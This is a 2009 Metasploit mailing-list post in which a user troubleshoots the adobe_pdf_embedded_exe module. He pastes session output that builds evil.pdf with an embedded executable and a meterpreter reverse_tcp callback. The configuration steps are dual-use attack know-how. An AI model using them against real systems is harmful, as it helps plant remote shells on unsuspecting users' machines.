Metasploit mailing list archives
Small fix in adobe_pdf_embedded_exe.rb
From: jeffs at speakeasy.net (Jeffs)
Date: Wed, 26 Aug 2009 00:05:45 -0400
Thank you for the patch, Danilo. I applied it but when I run the 'spoit this is what I get in windows xp sp3 in a pop up box See my session results here. I would appreciate any help you can offer. Thanks. ====================================================== c:\windows\system32\cmd.exe: The system cannot find the file specified and in a separate box: Windows cannot find cigar.exe. Make sure you type the name correctly and try again. ========================================================= And here is the output of my metapsloit session for creating the 'sploit: Module options: Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME /home/bagside/calc.exe no The Name of payload exe. FILENAME evil.pdf no The output filename. INFILENAME /home/bagside/cigar.pdf no The Input PDF filename. OUTPUTPATH ./data/exploits/ no The location to output the file. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 192.168.1.111 yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x (Windows XP SP3 English) msf exploit(adobe_pdf_embedded_exe) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Reading in '/home/bagside/cigar.pdf'... [*] Parseing '/home/bagside/cigar.pdf'... [*] Parseing Successfull. [*] Using '/home/bagside/calc.exe' as payload... [*] Creating 'evil.pdf' file... [*] Generated output file /tools/exploits/trunk/data/exploits/evil.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_pdf_embedded_exe) > Danilo Nascimento wrote:
I was playing with adobe_pdf_embedded_exe.rb in Win 7 and i got an error "Windows cannot find 'c:\\windows\system32\cmd.exe'". Changed to "c:\" and it works fine. BTW, why this module is an exploit? I think this exploit should be moved to an auxiliary module. Are there anyway to use FILEFORMAT class in an auxiliary module? []'s Danilo Nascimento ------------------------------------------------------------------------ _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090826/a5655e06/attachment.html>
Current thread:
- Small fix in adobe_pdf_embedded_exe.rb Danilo Nascimento (Aug 25)
- Small fix in adobe_pdf_embedded_exe.rb Jeffs (Aug 25)
- Small fix in adobe_pdf_embedded_exe.rb MC (Aug 26)
- proxying with msfpayload et al Jeffs (Sep 06)
- proxying with msfpayload et al HD Moore (Sep 06)
- proxying with msfpayload et al Jeffs (Sep 06)
- Small fix in adobe_pdf_embedded_exe.rb Jeffs (Aug 26)
- Small fix in adobe_pdf_embedded_exe.rb max (Aug 26)